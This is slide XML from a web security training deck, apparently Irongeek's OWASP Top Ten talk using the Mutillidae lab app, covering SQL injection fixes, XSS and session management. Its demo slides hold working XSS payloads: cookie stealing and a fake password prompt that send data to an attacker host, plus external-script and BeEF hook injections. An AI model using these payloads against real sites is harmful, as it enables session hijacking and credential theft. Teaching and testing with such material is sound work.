              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command line Kung Fu</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://blog.commandlinekungfu.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </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Fixes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input validation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use strongly typed parameterized query APIs (bound parameters). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enforce least privilege.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid detailed error messages. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Show care when using stored procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not use dynamic query interfaces. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not use simple escaping functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Watch out for canonicalization errors.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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A2 - Cross Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8153400" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>	XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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Time!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="5013325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Simple:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert("XSS");&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Page Redirect:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> = "http://www.irongeek.com/"&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Cookie Stealing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>="http://attacker.hak/mutillidae/catch.php?cookie="+encodeURI(document.cookie);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Time!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="5013325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Simple:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert("XSS");&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Page Redirect:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> = "http://www.irongeek.com/"&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Cookie Stealing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>attacker.hak/mutillidae/ccatch.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="+encodeURI(document.cookie);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Password Con:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>username=prompt('Please enter your username',' ');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>password=prompt('Please enter your password',' ');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>document.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>=\"http://attacker.hak/mutillidae/catch.php?username="+username+"&amp;password="+password+"\"&gt;");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Time!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="5013325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>External </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>="http://ha.ckers.org/xss.js"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Hot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;script language='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>='http://attacker.hak/beef/hook/beefmagic.js.php'&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>How about the User Agent string?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5089525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mangle XSS to bypass filters: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://ha.ckers.org/xss.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> browser exploitation framework</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.bindshell.net/tools/beef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XSS Me Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-US/firefox/addon/7598</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Exotic Injection Vectors </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Fixes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Strong output encoding. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Specify the output encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not use "blacklist" validation to detect XSS in input or to encode output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Watch out for canonicalization errors.</a:t>
            </a:r>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cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="1524000"/>
            <a:ext cx="2590800" cy="3890091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="0"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>About Adrian</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="762000"/>
            <a:ext cx="5867400" cy="5546725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I run Irongeek.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I have an interest in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>InfoSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> education</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I don’t know everything - I’m just a geek with time on my hands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>I’m also not a professional web developer, creating crappy code was easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>me. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So why listen to me? Sometimes it takes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>noob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to teach a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>noob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </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mtClean="0"/>
              <a:t>A3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8153400" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>	Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.</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time!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This can be very application specific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Let’s Edit A Cookie!</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Edit Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-US/firefox/addon/4510</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tamper Data Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Plugin</a:t>
            </a:r>
